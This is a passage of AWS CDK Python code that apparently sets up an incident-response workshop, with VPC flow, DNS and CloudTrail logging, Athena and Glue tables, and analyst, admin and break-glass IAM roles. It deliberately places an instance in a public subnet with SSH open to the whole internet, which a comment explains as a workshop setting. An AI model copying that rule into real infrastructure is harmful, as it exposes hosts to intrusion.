description="allow HTTPS TCP/443 within VPC CIDR", 98 | peer=aws_ec2.Peer.ipv4("192.168.0.0/16"), 99 | ) 100 | security_group.add_ingress_rule( 101 | connection=aws_ec2.Port.tcp(22), 102 | description="allow SSH TCP/22 from the internet", 103 | peer=aws_ec2.Peer.ipv4("0.0.0.0/0"), 104 | ) 105 | just_an_instance_role = aws_iam.Role( 106 | self, 107 | "instance role", 108 | assumed_by=aws_iam.ServicePrincipal("ec2.amazonaws.com"), 109 | managed_policies=[ 110 | aws_iam.ManagedPolicy.from_aws_managed_policy_name( 111 | "AmazonSSMManagedInstanceCore") 112 | ], 113 | ) 114 | just_an_instance = aws_ec2.Instance( 115 | self, 116 | "JustAnInstance", 117 | allow_all_outbound=True, 118 | instance_name="just_an_instance", 119 | instance_type=aws_ec2.InstanceType("t3.small"), 120 | machine_image=aws_ec2.MachineImage.latest_amazon_linux2023(), 121 | vpc=vpc, 122 | vpc_subnets=aws_ec2.SubnetSelection( 123 | subnet_type=aws_ec2.SubnetType.PUBLIC 124 | ), 125 | security_group=security_group, 126 | role=just_an_instance_role, 
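        # Note: this instance is placed in a public subnet with a security group
        # that accepts SSH (TCP/22) from 0.0.0.0/0 and allows all outbound traffic,
        # a deliberately permissive setup for the workshop's incident scenarios
        # rather than a hardened baseline.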
127 | ) 128 | vpc_flow_log = aws_ec2.CfnFlowLog( 129 | self, 130 | "VPCFlowLog", 131 | resource_id=vpc.vpc_id, 132 | resource_type="VPC", 133 | traffic_type="ALL", 134 | log_destination_type="s3", 135 | log_destination=logging_bucket.bucket_arn, 136 | log_format="".join(["${version} ${account-id} ${interface-id} ${srcaddr} ${dstaddr} ${srcport} ${dstport} ", 137 | "${protocol} ${packets} ${bytes} ${start} ${end} ${action} ${log-status} ${vpc-id} ", 138 | "${subnet-id} ${instance-id} ${tcp-flags} ${type} ${pkt-srcaddr} ${pkt-dstaddr} ", 139 | "${region} ${az-id} ${sublocation-type} ${sublocation-id} ${pkt-src-aws-service} ", 140 | "${pkt-dst-aws-service} ${flow-direction} ${traffic-path}"]), 141 | max_aggregation_interval=60, 142 | ) 143 | dns_logs = aws_route53resolver.CfnResolverQueryLoggingConfig( 144 | self, 145 | "DNSLogs", 146 | destination_arn=logging_bucket.bucket_arn, 147 | name="DNS Logs for IR Workshop", 148 | ) 149 | dns_logs_association = aws_route53resolver.CfnResolverQueryLoggingConfigAssociation( 150 | self, 151 | "DNSLogsAssociation", 152 | resolver_query_log_config_id=dns_logs.attr_id, 153 | resource_id=vpc.vpc_id, 154 | ) 155 | dns_logs_association.add_dependency(dns_logs) 156 | athena_workgroup_output_location = "".join(["s3://", 157 | athena_bucket.bucket_name, 158 | "/"]) 159 | 160 | CfnParamAthenaEngineVersion = CfnParameter( 161 | self, 162 | "ParamAthenaEngineVersion", 163 | type="String", 164 | default="Athena engine version 3", 165 | description="Athena Engine Version", 166 | ) 167 | 168 | athena_workgroup = aws_athena.CfnWorkGroup( 169 | self, 170 | "AthenaWorkGroup", 171 | name="IRWorkshopAthenaWorkGroup", 172 | state="ENABLED", 173 | recursive_delete_option=True, 174 | work_group_configuration=aws_athena.CfnWorkGroup.WorkGroupConfigurationProperty( 175 | enforce_work_group_configuration=True, 176 | result_configuration=aws_athena.CfnWorkGroup.ResultConfigurationProperty( 177 | encryption_configuration=aws_athena.CfnWorkGroup.EncryptionConfigurationProperty( 178 | encryption_option="SSE_S3", 179 | ), 180 | output_location=athena_workgroup_output_location, 181 | ), 182 | requester_pays_enabled=False, 183 | publish_cloud_watch_metrics_enabled=False, 184 | engine_version=aws_athena.CfnWorkGroup.EngineVersionProperty( 185 | selected_engine_version=CfnParamAthenaEngineVersion.value_as_string, 186 | ) 187 | ) 188 | ) 189 | CfnOutput( 190 | self, 191 | "AthenaWorkgroupQueryOutputLocation", 192 | description="Athena Workgroup queries output location", 193 | value=athena_workgroup_output_location, 194 | ) 195 | CfnOutput( 196 | self, 197 | "AthenaWorkgroupName", 198 | description="Athena Workgroup for workshop use", 199 | value=athena_workgroup.name, 200 | ) 201 | glue_database = aws_glue.CfnDatabase( 202 | self, 203 | "IRWorkshopGlueDatabase", 204 | catalog_id=Aws.ACCOUNT_ID, 205 | database_input=aws_glue.CfnDatabase.DatabaseInputProperty( 206 | name="irworkshopgluedatabase", 207 | ), 208 | ) 209 | CfnParamCloudTrailProjectionEventStartDate = CfnParameter( 210 | self, 211 | "ParamCloudTrailProjectionEventStartDate", 212 | type="String", 213 | default="2021/06/14", 214 | description="Athena CloudTrail Table Projection Partition Start Date", 215 | ) 216 | RegionPartitionValues = "".join(["us-east-2,us-east-1,us-west-1,us-west-2,af-south-1,ap-east-1,", 217 | "ap-south-1,ap-northeast-3,ap-northeast-2,ap-southeast-1,ap-southeast-2,", 218 | "ap-northeast-1,ca-central-1,cn-north-1,cn-northwest-1,eu-central-1,", 219 | 
"eu-west-1,eu-west-2,eu-south-1,eu-west-3,eu-north-1,me-south-1,sa-east-1"]) 220 | CloudTrailProjectionDateRange = CfnParamCloudTrailProjectionEventStartDate.value_as_string + ", NOW" 221 | CloudTrailSource = "".join(["s3://", 222 | logging_bucket.bucket_name, 223 | "/AWSLogs/", 224 | "${account_partition}/CloudTrail/${region_partition}/${date_partition}"]) 225 | glue_table_cloudtrail_parameters = { 226 | "classification": "json", 227 | "EXTERNAL": "true", 228 | "projection.enabled": "true", 229 | "projection.date_partition.type": "date", 230 | "projection.date_partition.range": CloudTrailProjectionDateRange, 231 | "projection.date_partition.format": "yyyy/MM/dd", 232 | "projection.date_partition.interval": "1", 233 | "projection.date_partition.interval.unit": "DAYS", 234 | "projection.region_partition.type": "enum", 235 | "projection.region_partition.values": RegionPartitionValues, 236 | "projection.account_partition.type": "enum", 237 | "projection.account_partition.values": Aws.ACCOUNT_ID, 238 | "storage.location.template": CloudTrailSource, 239 | } 240 | glue_table_cloudtrail_partition_keys = [ 241 | {"name": "date_partition", "type": "string"}, 242 | {"name": "region_partition", "type": "string"}, 243 | {"name": "account_partition", "type": "string"}, 244 | 245 | ] 246 | glue_table_cloudtrail_columns = [ 247 | {"name": "eventversion", "type": "string"}, 248 | {"name": "useridentity", "type": "struct,sessionissuer:struct>>"}, 253 | {"name": "eventtime", "type": "string"}, 254 | {"name": "eventsource", "type": "string"}, 255 | {"name": "eventname", "type": "string"}, 256 | {"name": "awsregion", "type": "string"}, 257 | {"name": "sourceipaddress", "type": "string"}, 258 | {"name": "useragent", "type": "string"}, 259 | {"name": "errorcode", "type": "string"}, 260 | {"name": "errormessage", "type": "string"}, 261 | {"name": "requestparameters", "type": "string"}, 262 | {"name": "responseelements", "type": "string"}, 263 | {"name": "additionaleventdata", "type": "string"}, 264 | {"name": "eventid", "type": "string"}, 265 | {"name": "resources", "type": "array>"}, 266 | {"name": "eventtype", "type": "string"}, 267 | {"name": "apiversion", "type": "string"}, 268 | {"name": "readonly", "type": "string"}, 269 | {"name": "recipientaccountid", "type": "string"}, 270 | {"name": "serviceeventdetails", "type": "string"}, 271 | {"name": "sharedeventid", "type": "string"}, 272 | {"name": "vpcendpointid", "type": "string"}, 273 | ] 274 | logs_location = "".join(["s3://", 275 | logging_bucket.bucket_name, 276 | "/AWSLogs/"]) 277 | CfnOutput( 278 | self, 279 | "S3BucketLocationWithLogs", 280 | description="S3 Bucket location containing CloudTrail, VPC Flow, and DNS logs for workshop use", 281 | value=logs_location, 282 | ) 283 | glue_table_cloudtrail = aws_glue.CfnTable( 284 | self, 285 | "IRWorkshopGlueTableCloudTrail", 286 | catalog_id=Aws.ACCOUNT_ID, 287 | database_name="irworkshopgluedatabase", 288 | table_input=aws_glue.CfnTable.TableInputProperty( 289 | name="irworkshopgluetablecloudtrail", 290 | table_type="EXTERNAL_TABLE", 291 | parameters=glue_table_cloudtrail_parameters, 292 | partition_keys=glue_table_cloudtrail_partition_keys, 293 | storage_descriptor=aws_glue.CfnTable.StorageDescriptorProperty( 294 | output_format="org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat", 295 | columns=glue_table_cloudtrail_columns, 296 | input_format="com.amazon.emr.cloudtrail.CloudTrailInputFormat", 297 | location=logs_location, 298 | serde_info=aws_glue.CfnTable.SerdeInfoProperty( 299 | 
parameters={"serialization.format": "1"}, 300 | serialization_library="com.amazon.emr.hive.serde.CloudTrailSerde", 301 | ), 302 | ) 303 | ), 304 | ) 305 | 306 | CfnParamVPCFlowProjectionEventStartDate = CfnParameter( 307 | self, 308 | "ParamVPCFlowProjectionEventStartDate", 309 | type="String", 310 | default="2021/06/14", 311 | description="Athena VPC Flow Table Projection Partition Start Date", 312 | ) 313 | VPCFlowProjectionDateRange = CfnParamVPCFlowProjectionEventStartDate.value_as_string + ", NOW" 314 | VPCFlowSource = "".join(["s3://", 315 | logging_bucket.bucket_name, 316 | "/AWSLogs/", 317 | "${account_partition}/vpcflowlogs/${region_partition}/${date_partition}"]) 318 | glue_table_vpcflow_parameters = { 319 | "classification": "csv", 320 | "EXTERNAL": "true", 321 | "projection.enabled": "true", 322 | "projection.date_partition.type": "date", 323 | "projection.date_partition.range": VPCFlowProjectionDateRange, 324 | "projection.date_partition.format": "yyyy/MM/dd", 325 | "projection.date_partition.interval": "1", 326 | "projection.date_partition.interval.unit": "DAYS", 327 | "projection.region_partition.type": "enum", 328 | "projection.region_partition.values": RegionPartitionValues, 329 | "projection.account_partition.type": "enum", 330 | "projection.account_partition.values": Aws.ACCOUNT_ID, 331 | "storage.location.template": VPCFlowSource, 332 | } 333 | glue_table_vpcflow_partition_keys = [ 334 | {"name": "date_partition", "type": "string"}, 335 | {"name": "region_partition", "type": "string"}, 336 | {"name": "account_partition", "type": "string"}, 337 | 338 | ] 339 | glue_table_vpcflow_columns = [ 340 | {"name": "version", "type": "int"}, 341 | {"name": "account", "type": "string"}, 342 | {"name": "interfaceid", "type": "string"}, 343 | {"name": "sourceaddress", "type": "string"}, 344 | {"name": "destinationaddress", "type": "string"}, 345 | {"name": "sourceport", "type": "int"}, 346 | {"name": "destinationport", "type": "int"}, 347 | {"name": "protocol", "type": "int"}, 348 | {"name": "numpackets", "type": "int"}, 349 | {"name": "numbytes", "type": "bigint"}, 350 | {"name": "starttime", "type": "int"}, 351 | {"name": "endtime", "type": "int"}, 352 | {"name": "action", "type": "string"}, 353 | {"name": "logstatus", "type": "string"}, 354 | {"name": "vpcid", "type": "string"}, 355 | {"name": "subnetid", "type": "string"}, 356 | {"name": "instanceid", "type": "string"}, 357 | {"name": "tcpflags", "type": "smallint"}, 358 | {"name": "type", "type": "string"}, 359 | {"name": "pktsrcaddr", "type": "string"}, 360 | {"name": "pktdstaddr", "type": "string"}, 361 | {"name": "region", "type": "string"}, 362 | {"name": "azid", "type": "string"}, 363 | {"name": "sublocationtype", "type": "string"}, 364 | {"name": "sublocationid", "type": "string"}, 365 | {"name": "pkt_src_aws_service", "type": "string"}, 366 | {"name": "pkt_dst_aws_service", "type": "string"}, 367 | {"name": "flow_direction", "type": "string"}, 368 | {"name": "traffic_path", "type": "string"}, 369 | ] 370 | logs_location = "".join(["s3://", 371 | logging_bucket.bucket_name, 372 | "/AWSLogs/"]) 373 | glue_table_vpcflow = aws_glue.CfnTable( 374 | self, 375 | "IRWorkshopGlueTableVPCFlow", 376 | catalog_id=Aws.ACCOUNT_ID, 377 | database_name="irworkshopgluedatabase", 378 | table_input=aws_glue.CfnTable.TableInputProperty( 379 | name="irworkshopgluetablevpcflow", 380 | table_type="EXTERNAL_TABLE", 381 | parameters=glue_table_vpcflow_parameters, 382 | partition_keys=glue_table_vpcflow_partition_keys, 383 | 
storage_descriptor=aws_glue.CfnTable.StorageDescriptorProperty( 384 | output_format="org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat", 385 | columns=glue_table_vpcflow_columns, 386 | input_format="org.apache.hadoop.mapred.TextInputFormat", 387 | location=logs_location, 388 | serde_info=aws_glue.CfnTable.SerdeInfoProperty( 389 | parameters={"serialization.format": "", 390 | "field.delim": " "}, 391 | serialization_library="org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe", 392 | ), 393 | ) 394 | ), 395 | ) 396 | CfnParamDNSProjectionEventStartDate = CfnParameter( 397 | self, 398 | "ParamDNSProjectionEventStartDate", 399 | type="String", 400 | default="2021/06/14", 401 | description="Athena DNS Table Projection Partition Start Date", 402 | ) 403 | DNSProjectionDateRange = CfnParamDNSProjectionEventStartDate.value_as_string + ", NOW" 404 | DNSSource = "".join(["s3://", 405 | logging_bucket.bucket_name, 406 | "/AWSLogs/", 407 | "${account_partition}/vpcdnsquerylogs/${vpc_partition}/${date_partition}"]) 408 | glue_table_dns_parameters = { 409 | "classification": "csv", 410 | "EXTERNAL": "true", 411 | "projection.enabled": "true", 412 | "projection.date_partition.type": "date", 413 | "projection.date_partition.range": DNSProjectionDateRange, 414 | "projection.date_partition.format": "yyyy/MM/dd", 415 | "projection.date_partition.interval": "1", 416 | "projection.date_partition.interval.unit": "DAYS", 417 | "projection.vpc_partition.type": "enum", 418 | "projection.vpc_partition.values": vpc.vpc_id, 419 | "projection.account_partition.type": "enum", 420 | "projection.account_partition.values": Aws.ACCOUNT_ID, 421 | "storage.location.template": DNSSource, 422 | } 423 | glue_table_dns_partition_keys = [ 424 | {"name": "date_partition", "type": "string"}, 425 | {"name": "vpc_partition", "type": "string"}, 426 | {"name": "account_partition", "type": "string"}, 427 | 428 | ] 429 | glue_table_dns_columns = [ 430 | {"name": "version", "type": "float"}, 431 | {"name": "account_id", "type": "string"}, 432 | {"name": "region", "type": "string"}, 433 | {"name": "vpc_id", "type": "string"}, 434 | {"name": "query_timestamp", "type": "string"}, 435 | {"name": "query_name", "type": "string"}, 436 | {"name": "query_type", "type": "string"}, 437 | {"name": "query_class", "type": "string"}, 438 | {"name": "rcode", "type": "string"}, 439 | {"name": "answers", "type": "array<string>"}, 440 | {"name": "srcaddr", "type": "string"}, 441 | {"name": "srcport", "type": "int"}, 442 | {"name": "transport", "type": "string"}, 443 | {"name": "srcids", "type": "string"}, 444 | ] 445 | glue_table_dns = aws_glue.CfnTable( 446 | self, 447 | "IRWorkshopGlueTableDNS", 448 | catalog_id=Aws.ACCOUNT_ID, 449 | database_name="irworkshopgluedatabase", 450 | table_input=aws_glue.CfnTable.TableInputProperty( 451 | name="irworkshopgluetabledns", 452 | table_type="EXTERNAL_TABLE", 453 | parameters=glue_table_dns_parameters, 454 | partition_keys=glue_table_dns_partition_keys, 455 | storage_descriptor=aws_glue.CfnTable.StorageDescriptorProperty( 456 | output_format="org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat", 457 | columns=glue_table_dns_columns, 458 | input_format="org.apache.hadoop.mapred.TextInputFormat", 459 | location=logs_location, 460 | serde_info=aws_glue.CfnTable.SerdeInfoProperty( 461 | parameters={"serialization.format": ""}, 462 | serialization_library="org.openx.data.jsonserde.JsonSerDe", 463 | ), 464 | ) 465 | ), 466 | ) 467 | 468 | CfnParamBasePrincipal = CfnParameter( 469 | self, 470 | 
"ParamBasePrincipal", 471 | type="String", 472 | default="role/WSParticipantRole", 473 | description="".join(["IAM Principal to assume Security roles ", 474 | "(usage: IAM User - prefix with user/, IAM Role - prefix with role/)"]), 475 | ) 476 | 477 | security_analyst_role_policy = aws_iam.ManagedPolicy( 478 | self, 479 | "SecurityAnalystRolePolicy", 480 | statements=[ 481 | aws_iam.PolicyStatement( 482 | sid="SecurityNamedQueryFullAccess", 483 | effect=aws_iam.Effect.ALLOW, 484 | actions=["athena:BatchGetNamedQuery", 485 | "athena:CreateNamedQuery", 486 | "athena:DeleteNamedQuery", 487 | "athena:GetNamedQuery", 488 | "athena:ListNamedQueries"], 489 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 490 | ":workgroup/", athena_workgroup.name])] 491 | ), 492 | aws_iam.PolicyStatement( 493 | sid="SecurityWorkgroupReadOnly", 494 | effect=aws_iam.Effect.ALLOW, 495 | actions=["athena:GetWorkGroup", 496 | "athena:ListWorkGroups", 497 | "athena:BatchGetQueryExecution", 498 | "athena:GetQueryExecution", 499 | "athena:GetQueryResults", 500 | "athena:GetQueryResultsStream", 501 | "athena:ListQueryExecutions", 502 | "athena:ListTagsForResource", 503 | "athena:StartQueryExecution", 504 | "athena:StopQueryExecution"], 505 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 506 | ":workgroup/", athena_workgroup.name])] 507 | ), 508 | aws_iam.PolicyStatement( 509 | sid="SecurityWorkgroupListAll", 510 | effect=aws_iam.Effect.ALLOW, 511 | actions=["athena:ListWorkGroups"], 512 | resources=["*"] 513 | ), 514 | aws_iam.PolicyStatement( 515 | sid="SecurityAthenaDataCatalogReadOnly", 516 | effect=aws_iam.Effect.ALLOW, 517 | actions=["athena:GetDataCatalog", 518 | "athena:ListDataCatalogs", 519 | "athena:GetCatalogImportStatus", 520 | "athena:GetDatabase", 521 | "athena:ListDatabases", 522 | "athena:GetTableMetadata", 523 | "athena:ListTableMetadata"], 524 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 525 | ":datacatalog/", athena_workgroup.name])] 526 | ), 527 | aws_iam.PolicyStatement( 528 | sid="SecurityGlueDatabaseReadOnly", 529 | effect=aws_iam.Effect.ALLOW, 530 | actions=["glue:GetDatabase", 531 | "glue:GetDatabases"], 532 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 533 | ":database/", glue_database.database_input.name]), 534 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 535 | ":catalog"]) 536 | ] 537 | ), 538 | aws_iam.PolicyStatement( 539 | sid="SecurityGlueTableReadOnly", 540 | effect=aws_iam.Effect.ALLOW, 541 | actions=["glue:GetTable", 542 | "glue:GetTables"], 543 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 544 | ":table/", glue_database.database_input.name, "/*"]), 545 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 546 | ":database/", glue_database.database_input.name]), 547 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 548 | ":catalog"]) 549 | ] 550 | ), 551 | aws_iam.PolicyStatement( 552 | sid="SecurityGluePartitionReadOnly", 553 | effect=aws_iam.Effect.ALLOW, 554 | actions=["glue:BatchGetPartition", 555 | "glue:GetPartition", 556 | "glue:GetPartitions"], 557 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 558 | ":database/", athena_workgroup.name])] 559 | ), 560 | aws_iam.PolicyStatement( 561 | sid="AthenaOutputBucketReadWrite", 562 | effect=aws_iam.Effect.ALLOW, 563 | actions=["s3:AbortMultipartUpload", 564 | "s3:GetBucketLocation", 565 | "s3:GetObject", 566 | "s3:ListBucket", 567 | 
"s3:ListBucketMultipartUploads", 568 | "s3:ListMultipartUploadParts", 569 | "s3:PutObject"], 570 | resources=[athena_bucket.bucket_arn, 571 | athena_bucket.bucket_arn + "/*"] 572 | ), 573 | aws_iam.PolicyStatement( 574 | sid="LogSourceBucketReadOnly", 575 | effect=aws_iam.Effect.ALLOW, 576 | actions=["s3:GetObject", 577 | "s3:ListBucket"], 578 | resources=[logging_bucket.bucket_arn, 579 | logging_bucket.bucket_arn + "/*"] 580 | ), 581 | aws_iam.PolicyStatement( 582 | sid="ListLogAndOutputBuckets", 583 | effect=aws_iam.Effect.ALLOW, 584 | actions=["s3:GetBucketLocation", 585 | "s3:ListBucket"], 586 | resources=[logging_bucket.bucket_arn, 587 | athena_bucket.bucket_arn] 588 | ), 589 | aws_iam.PolicyStatement( 590 | sid="CloudShellPermissions", 591 | effect=aws_iam.Effect.ALLOW, 592 | actions=["cloudshell:*"], 593 | resources=["*"] 594 | ), 595 | ] 596 | ) 597 | 598 | security_analyst_role = aws_iam.Role( 599 | self, 600 | "SecurityAnalystRole", 601 | role_name="SecurityAnalystRole", 602 | managed_policies=[security_analyst_role_policy, 603 | aws_iam.ManagedPolicy.from_aws_managed_policy_name("ReadOnlyAccess")], 604 | assumed_by=aws_iam.AccountPrincipal( 605 | account_id=Aws.ACCOUNT_ID 606 | ).with_conditions( 607 | {"StringEquals": { 608 | "aws:PrincipalArn": [ 609 | "arn:aws:iam::" + Aws.ACCOUNT_ID + ":" + CfnParamBasePrincipal.value_as_string 610 | ] 611 | } 612 | } 613 | ) 614 | ) 615 | CfnOutput( 616 | self, 617 | "SecurityAnalystRoleARNforAthena", 618 | description="Role ARN to be assumed by security analyst for Athena use", 619 | value=security_analyst_role.role_arn, 620 | ) 621 | 622 | athena_admin_role_policy = aws_iam.ManagedPolicy( 623 | self, 624 | "AthenaAdminRolePolicy", 625 | statements=[ 626 | aws_iam.PolicyStatement( 627 | sid="SecurityNamedQueryFullAccess", 628 | effect=aws_iam.Effect.ALLOW, 629 | actions=["athena:BatchGetNamedQuery", 630 | "athena:CreateNamedQuery", 631 | "athena:DeleteNamedQuery", 632 | "athena:GetCatalogImportStatus", 633 | "athena:GetNamedQuery", 634 | "athena:ListNamedQueries"], 635 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 636 | ":workgroup/*"]) 637 | ] 638 | ), 639 | aws_iam.PolicyStatement( 640 | sid="SecurityWorkgroupFullAccess", 641 | effect=aws_iam.Effect.ALLOW, 642 | actions=["athena:CreateWorkGroup", 643 | "athena:DeleteWorkGroup", 644 | "athena:GetWorkGroup", 645 | "athena:ListWorkGroups", 646 | "athena:UpdateWorkGroup", 647 | "athena:BatchGetQueryExecution", 648 | "athena:GetQueryExecution", 649 | "athena:GetQueryResults", 650 | "athena:GetQueryResultsStream", 651 | "athena:ListQueryExecutions", 652 | "athena:ListTagsForResource", 653 | "athena:StartQueryExecution", 654 | "athena:StopQueryExecution"], 655 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 656 | ":workgroup/*"]) 657 | ] 658 | ), 659 | aws_iam.PolicyStatement( 660 | sid="SecurityAthenaDataCatalogFullAccess", 661 | effect=aws_iam.Effect.ALLOW, 662 | actions=["athena:CreateDataCatalog", 663 | "athena:DeleteDataCatalog", 664 | "athena:GetDataCatalog", 665 | "athena:ListDataCatalogs", 666 | "athena:UpdateDataCatalog", 667 | "athena:GetDatabase", 668 | "athena:ListDatabases", 669 | "athena:GetTableMetadata", 670 | "athena:ListTableMetadata"], 671 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 672 | ":datacatalog/*"]) 673 | ] 674 | ), 675 | aws_iam.PolicyStatement( 676 | sid="SecurityGlueDatabaseFullAccess", 677 | effect=aws_iam.Effect.ALLOW, 678 | actions=["glue:CreateDatabase", 679 | 
"glue:DeleteDatabase", 680 | "glue:GetDatabase", 681 | "glue:GetDatabases", 682 | "glue:UpdateDatabase"], 683 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 684 | ":database/*"]), 685 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 686 | ":catalog"]) 687 | ] 688 | ), 689 | aws_iam.PolicyStatement( 690 | sid="SecurityGlueTableFullAccess", 691 | effect=aws_iam.Effect.ALLOW, 692 | actions=["glue:BatchDeleteTable", 693 | "glue:CreateTable", 694 | "glue:DeleteTable", 695 | "glue:GetTables", 696 | "glue:GetTable", 697 | "glue:UpdateTable"], 698 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 699 | ":table/*"]), 700 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 701 | ":database/*"]), 702 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 703 | ":catalog"]) 704 | ] 705 | ), 706 | aws_iam.PolicyStatement( 707 | sid="SecurityGluePartitionReadWrite", 708 | effect=aws_iam.Effect.ALLOW, 709 | actions=["glue:BatchCreatePartition", 710 | "glue:BatchDeletePartition", 711 | "glue:BatchGetPartition", 712 | "glue:CreatePartition", 713 | "glue:DeletePartition", 714 | "glue:GetPartitions", 715 | "glue:BatchGetPartition", 716 | "glue:UpdatePartition"], 717 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 718 | ":database/*"])] 719 | ), 720 | aws_iam.PolicyStatement( 721 | sid="AthenaOutputBucketReadWrite", 722 | effect=aws_iam.Effect.ALLOW, 723 | actions=["s3:AbortMultipartUpload", 724 | "s3:GetBucketLocation", 725 | "s3:GetObject", 726 | "s3:ListBucket", 727 | "s3:ListBucketMultipartUploads", 728 | "s3:ListMultipartUploadParts", 729 | "s3:PutObject"], 730 | resources=[athena_bucket.bucket_arn, 731 | athena_bucket.bucket_arn + "/*"] 732 | ), 733 | aws_iam.PolicyStatement( 734 | sid="LogSourceBucketReadOnly", 735 | effect=aws_iam.Effect.ALLOW, 736 | actions=["s3:GetObject", 737 | "s3:ListBucket"], 738 | resources=[logging_bucket.bucket_arn, 739 | logging_bucket.bucket_arn + "/*"] 740 | ), 741 | aws_iam.PolicyStatement( 742 | sid="ListLogAndOutputBuckets", 743 | effect=aws_iam.Effect.ALLOW, 744 | actions=["s3:GetBucketLocation", 745 | "s3:ListBucket", 746 | "s3:ListAllMyBuckets"], 747 | resources=[logging_bucket.bucket_arn, 748 | athena_bucket.bucket_arn] 749 | ), 750 | aws_iam.PolicyStatement( 751 | sid="CloudShellPermissions", 752 | effect=aws_iam.Effect.ALLOW, 753 | actions=["cloudshell:*"], 754 | resources=["*"] 755 | ), 756 | ] 757 | ) 758 | 759 | athena_admin_role = aws_iam.Role( 760 | self, 761 | "AthenaAdminRole", 762 | role_name="SecurityAdminRole", 763 | managed_policies=[athena_admin_role_policy], 764 | assumed_by=aws_iam.AccountPrincipal( 765 | account_id=Aws.ACCOUNT_ID 766 | ).with_conditions( 767 | {"StringEquals": { 768 | "aws:PrincipalArn": [ 769 | "arn:aws:iam::" + Aws.ACCOUNT_ID + ":" + CfnParamBasePrincipal.value_as_string 770 | ] 771 | } 772 | } 773 | ) 774 | ) 775 | 776 | CfnOutput( 777 | self, 778 | "AthenaAdminRoleARN", 779 | description="Role ARN to be assumed by Athena administrator", 780 | value=athena_admin_role.role_arn, 781 | ) 782 | 783 | security_break_glass_role = aws_iam.Role( 784 | self, 785 | "SecurityBreakGlassRole", 786 | role_name="SecurityBreakGlassRole", 787 | managed_policies=[aws_iam.ManagedPolicy.from_aws_managed_policy_name("AdministratorAccess")], 788 | assumed_by=aws_iam.AccountPrincipal( 789 | account_id=Aws.ACCOUNT_ID 790 | ).with_conditions( 791 | {"StringEquals": { 792 | "aws:PrincipalArn": [ 793 | "arn:aws:iam::" + Aws.ACCOUNT_ID + ":" + 
CfnParamBasePrincipal.value_as_string 794 | ] 795 | } 796 | } 797 | ) 798 | ) 799 | 800 | CfnOutput( 801 | self, 802 | "SecurityBreakGlassRoleArn", 803 | description="Role ARN for Break Glass purposes during incidents", 804 | value=security_break_glass_role.role_arn, 805 | ) 806 | 807 | security_deploy_role_policy = aws_iam.ManagedPolicy( 808 | self, 809 | "SecurityDeployRolePolicy", 810 | statements=[ 811 | aws_iam.PolicyStatement( 812 | sid="StackPermissions", 813 | effect=aws_iam.Effect.ALLOW, 814 | actions=["cloudformation:CreateStack", 815 | "cloudformation:DescribeStacks", 816 | "cloudformation:DescribeStackEvents", 817 | "cloudformation:DescribeStackResources", 818 | "cloudformation:GetTemplate", 819 | "cloudformation:GetTemplateSummary", 820 | "cloudformation:ListStacks", 821 | "cloudformation:ValidateTemplate", 822 | "cloudformation:CreateUploadBucket"], 823 | resources=["*"] 824 | ), 825 | aws_iam.PolicyStatement( 826 | sid="CloudShellPermissions", 827 | effect=aws_iam.Effect.ALLOW, 828 | actions=["cloudshell:*"], 829 | resources=["*"] 830 | ), 831 | aws_iam.PolicyStatement( 832 | sid="S3Permissions", 833 | effect=aws_iam.Effect.ALLOW, 834 | actions=["s3:PutObject", 835 | "s3:ListBucket", 836 | "s3:GetObject", 837 | "s3:CreateBucket"], 838 | resources=["*"] 839 | ), 840 | aws_iam.PolicyStatement( 841 | sid="IAMPermissions", 842 | effect=aws_iam.Effect.ALLOW, 843 | actions=["iam:CreateUser", 844 | "iam:CreatePolicy", 845 | "iam:CreateAccessKey", 846 | "iam:GetUser", 847 | "iam:GetPolicy", 848 | "iam:CreateServiceLinkedRole", 849 | "iam:PutRolePolicy", 850 | "iam:DeleteRolePolicy"], 851 | resources=["*"] 852 | ), 853 | aws_iam.PolicyStatement( 854 | sid="GuardDutyAdmin", 855 | effect=aws_iam.Effect.ALLOW, 856 | actions=["guardduty:*"], 857 | resources=["*"] 858 | ) 859 | ] 860 | ) 861 | 862 | security_deploy_role = aws_iam.Role( 863 | self, 864 | "SecurityDeployRole", 865 | role_name="SecurityDeployRole", 866 | managed_policies=[security_deploy_role_policy], 867 | assumed_by=aws_iam.AccountPrincipal( 868 | account_id=Aws.ACCOUNT_ID 869 | ).with_conditions( 870 | {"StringEquals": { 871 | "aws:PrincipalArn": [ 872 | "arn:aws:iam::" + Aws.ACCOUNT_ID + ":" + CfnParamBasePrincipal.value_as_string 873 | ] 874 | } 875 | } 876 | ) 877 | ) 878 | 879 | CfnOutput( 880 | self, 881 | "SecurityDeployRoleArn", 882 | description="Role ARN to be assumed for resource deployment", 883 | value=security_deploy_role.role_arn, 884 | ) 885 | 886 | with open("analytics/cloudtrail/cloudtrail_demo_queries.sql") as f: 887 | sql_string = f.read() 888 | f.close() 889 | cloudtrail_queries = aws_athena.CfnNamedQuery( 890 | self, 891 | 